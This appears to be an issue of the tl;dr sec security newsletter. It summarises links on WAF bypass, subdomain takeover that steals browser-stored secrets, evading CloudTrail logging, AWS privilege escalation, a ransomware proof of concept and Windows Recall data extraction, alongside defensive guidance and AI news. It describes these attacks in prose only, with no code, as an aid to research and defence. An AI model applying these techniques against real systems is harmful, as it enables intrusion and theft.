• tl;dr sec
  • Posts
  • [tl;dr sec] #234 - Awesome CI/CD Attacks, STRIDE GPT, Non Production AWS Attack Surface

[tl;dr sec] #234 - Awesome CI/CD Attacks, STRIDE GPT, Non Production AWS Attack Surface

Practical resources for offensive CI/CD research, AI threat modeling tool, bypassing CloudTrail through non-prod endpoints

Hey there,

I hope you’ve been doing well!

If you’ve been reading tl;dr sec for a bit, it’s likely no surprise to you, dear reader, that I love secure defaults / guardrails / “paved roads.”

That is, eliminating classes of vulnerabilities by construction (vs playing bug whack-a-mole later).

Though it takes upfront work and there are both technical and inter-organizational challenges to making it work in the Real World™️, it can be one of the highest leverage things security teams can do.

Rami McCarthy has written an excellent post covering:

  • What are “secure defaults” and who’s been talking about it? (CISA, Meta, Google, Netflix, and others)

  • Characteristics of secure defaults

  • Examples across AppSec, infrastructure, and endpoint security

  • Who is selling security defaults

  • Challenges in selling secure defaults

  • and more

As with any of Rami’s posts, it comes with oodles of great supporting links if you want to go deeper.

You can 👉️ read it here 👈️ .

(Pretend I also wrote a both funny and heart-warming intro before this. It’s late and I ran out of time 😅 )

Sponsor

📣 Navigating the NIST AI Framework

Last year, the National Institute of Standards and Technology (NIST) released the new NIST AI Risk Management Framework (RMF) with the goal of helping organizations manage AI risk.

In this ultimate guide, explore why AI risk matters, uncover the key challenges you’ll run into when managing AI risk, and dive deep into the NIST AI RMF. You’ll walk away with everything you need to know to get started with the framework!

Colleagues yolo-shipping AI features? It’s useful to hear perspective from thoughtful groups like NIST on managing AI risk 👍️ 

AppSec

assetnote/nowafpls
A Burp plugin by Shubham Shah that bypasses Web Application Firewalls (WAFs) by inserting junk data into HTTP requests, exploiting the fact that most WAFs have limitations for how much data they can process when a request body is sent. See also Shubs’ NahamCon 2024 talk Modern WAF Bypass Techniques on Large Attack Surfaces.

Netflix’s Journey to One Million in Bug Bounty and Beyond
Lakshmi Sudheer shares that Netflix’s bug bounty program has now paid out >$1M since its launch in 2016. 5,360 unique researchers, 7,971 non-duplicate reports, rewarded 845 valid vulnerabilities, 26% of which were Critical or High Severity.

Hacking Millions of Modems (and Investigating Who Hacked My Modem)
Sam Curry discovered that his modem had likely been hacked when he noticed an unknown IP address intercepting and replaying his HTTP traffic.

The bulk of the post is a detailed walk through of how he later found a series of vulnerabilities in the Cox Business portal that would have allowed a fully external attacker with no prerequisites to execute commands and modify the settings of millions of modems, access any business customer's PII, and gain essentially the same permissions of an ISP support team.

💡 Great black box testing methodology example: determining the tech stack, finding Swagger docs to understand attack surface and available functionality, finding an auth bypass, chaining steps together, etc. Very fun read.

Sponsor

⚡️Mitigate CI/CD Risks ⚡️

Want to bolster your CI/CD pipeline?

This new cheat sheet covers best practices with actionable items in Infrastructure security, code security, secrets management, access and authentication, and monitoring and response.

As links in nigh every tl;dr sec show, there are a lot of ways CI/CD security can go wrong 😅 Nice to have a handy cheat sheet with actionable tips.

Cloud Security

AWS IAM Privilege Escalation Techniques
Hacking The Cloud page by Nick Frichette covering >35 different techniques.

Things you wish you didn't need to know about S3
Plerion’s Daniel Grzelak takes us on a journey through S3 oddities, including: S3 buckets are the S3 API, ListObjects is not the only way to get object keys, multipart upload listings leak return principal ARNs, access control lists can grant access based on email, S3 will tell you the bucket owner if you ask nicely, and more. Also, what appear to be really locked down S3 buckets can still be public via CloudFront or Cognito.

Choice quotes: “In recent years, AWS has done a stellar job confiscating foot guns they previously distributed.” “There are some people in this world who enjoy crimes.”

Non-Production Endpoints as an Attack Surface in AWS
Datadog’s Nick Frichette describes how he identified two new archetypes for bypassing AWS CloudTrail through certain non-production endpoints with API actions that access account-level information and through API calls which generate multiple events in CloudTrail. Being able to enumerate permissions without logging to CloudTrail allows attackers to stealthily assess the privileges of compromised credentials.

💡 This post is a great example of black box testing complex systems and looking for behavior edge cases. Also how to find non-production endpoints at scale (certificate transparency + automation).

Credentials Leaking with Subdomain Takeover
Neat post by Truffle’s Joe Leon on an issue identified on the documentation platform ReadMe. Basically:

  1. If a site allows you to set a subdomain for your org (e.g. ORG_NAME.readme.io) and stores sensitive info (like API keys) in localStorage of user browsers, then-

  2. If a company stops using that service but doesn’t remove the CNAME, you have a classic subdomain takeover.

  3. But in this case, if a victim goes to your malicious site, because it’s on the same domain, malicious JavaScript can extract the secret(s) from the browser’s localStorage.

💡 It’s not uncommon for sites to let you set org-specific custom subdomains like this, so I bet you can find other services with the same issue.

Also, initially ReadMe wasn’t going to fix this, so Truffle proactively squatted the domains for all impacted orgs and proactively emailed them with detailed remediation instructions. This is A+ being a good Internet citizen, nice work 🤘 

Supply Chain

NIST expects to clear backlog in vulnerabilities database by end of fiscal year
They’ve awarded a new contract to an outside vendor to help. TIL the NVD staff is 21 people and had a 12% drop in funding for this fiscal year.

TupleType/awesome-cicd-attacks
By Asi Greenholts: Practical resources for offensive CI/CD security research across techniques (publicly exposed sensitive data, initial code execution, post exploitation, defense evasion), offensive tools, case studies, and similar projects. Much of the resources have previously been called out in tl;dr sec 😎 

Working as unexpected
Chainguard’s Matt Moore shares a tale of a “working as intended” branch protection bypass (when using wildcard branch protection rules) that allows for protected credential exfiltration. Best practices for branch protections (more in the post):

  • Favor the use of repository rulesets (new) over branch protections (old), which can actually block administrators if they are not explicitly put onto the bypass list. 

  • Only use wildcards in branch protections when absolutely necessary.

  • When using wildcard branch protections always restrict who can create matching branches (e.g. so that only admins can create release branches).

Blue Team

Rolling your own Detections as Code with Elastic Security
Elastic’s Mika Ayenson, Kseniia Ignatovych, and Justin Ibarra give a nice overview of Detections as Code and how they’re aiming to make managing your own custom Elastic rules easier.

The detection-rules repo is now easier to use for custom rules management (minimize merge conflicts), you can configure which of the Elastic-provided unit tests should run on custom rules and which should be skipped, and you can manage rule settings like exceptions and actions alongside detections.

Tactical Guide to Threat Hunting in Snowflake Environments
Mitiga’s Doron Karmi, Or Aspir, and Roei Sherman describe how a threat actor has been using stolen customer credentials to target organizations using Snowflake databases and extorting them. They detail how to use "Query_History" and "Login_history" logs to effectively identify and investigate suspicious behavior within your Snowflake environment, providing example queries, hardening settings, and mitigation advice (our dear friends SSO & 2FA).

Red Team

SafeBreach-Labs/DoubleDrive
By SafeBreach’s Or Yair: A ransomware PoC that utilizes cloud drive services (OneDrive, Google Drive) to encrypt target files. Presented at Black Hat USA 2023 Briefing.

Introducing BadDNS
Black Lantern Security’s Paul Mueller announces the release of a new Python DNS auditing tool, BadDNS, designed for subdomain takeover detection, zone transfers, and NSEC walking, with unique features like checking HTML for links or other references that contain a hijackable domain as well checking TXT records.

AI + Security

Disrupting deceptive uses of AI by covert influence operations
OpenAI has terminated accounts used by Russia, China, Iran, and a commercial company in Israel that were using OpenAI models for influence operations, largely assisting in text generation (e.g. social media or blog posts that sound more fluent) or writing or debugging code. “No significant audience increase due to our services.”

Mapping the Mind of a Large Language Model
Anthropic has used dictionary learning to map the internal workings of Claude Sonnet, identifying millions of features that represent a wide range of concepts (e.g. cities like San Francisco or abstract concepts like conversations about keeping secrets). This breakthrough provides a detailed look into the model's internal states, offering insights into how AI models process information and paving the way for safer and more reliable AI systems. Very cool work, enjoyed the diagrams.

See also Golden Gate Claude, a version of Claude tuned to be obsessed with the Golden Gate Bridge.

STRIDE GPT v0.8
The latest version of Matthew Adams’ AI-powered threat modeling tool (GitHub) that leverages OpenAI's GPT models to generate threat models for a given application based on the STRIDE methodology. This version adds DREAD risk scoring and automatically generating Gherkin test cases based on identified threats.

Stealing everything you’ve ever typed or viewed on your own Windows PC is now possible with two lines of code — inside the Copilot+ Recall disaster.
Excellent breakdown and FAQ by Kevin Beaumont on Window’s new “Recall” feature. How it works: “Every few seconds, screenshots are taken. These are automatically OCR’d by Azure AI, running on your device, and written into an SQLite database in the user’s folder. This database file has a record of everything you’ve ever viewed on your PC in plain text.”

So if you get compromised by malware, it can trivially steal in a generic and quick way basically anything you’ve ever looked at- banking info, healthcare info, private texts, emails, or other messages, etc.

xaitax/TotalRecall
Tool by Alexander Hagenah that extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots.

AI

How Anthropic Designed Itself to Avoid OpenAI’s Mistakes
“Unlike OpenAI, which essentially operates as a capped-profit company governed by a nonprofit board that is not accountable to the company’s shareholders, Anthropic is a public benefit corporation (PBC), which means that as well as having a fiduciary obligation to increase profits for shareholders, its board also has legal room to follow a separate mission: to ensure that ‘transformative AI helps people and society flourish.’”

“What that essentially means is that shareholders would find it more difficult to sue Anthropic’s board if the board chose to prioritize safety over increasing profits.”

Financial Statement Analysis with Large Language Models
“We investigate whether an LLM can successfully perform financial statement analysis in a way similar to a professional human analyst. We provide standardized and anonymous financial statements to GPT4 and instruct the model to analyze them to determine the direction of future earnings. Even without any narrative or industry-specific information, the LLM outperforms financial analysts in its ability to predict earnings change.”

“LLM prediction does not stem from its training memory. Instead, we find that the LLM generates useful narrative insights about a company's future performance. Lastly, our trading strategies based on GPT's predictions yield a higher Sharpe ratio and alphas than strategies based on other models. Taken together, our results suggest that LLMs may take a central role in decision-making.”

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler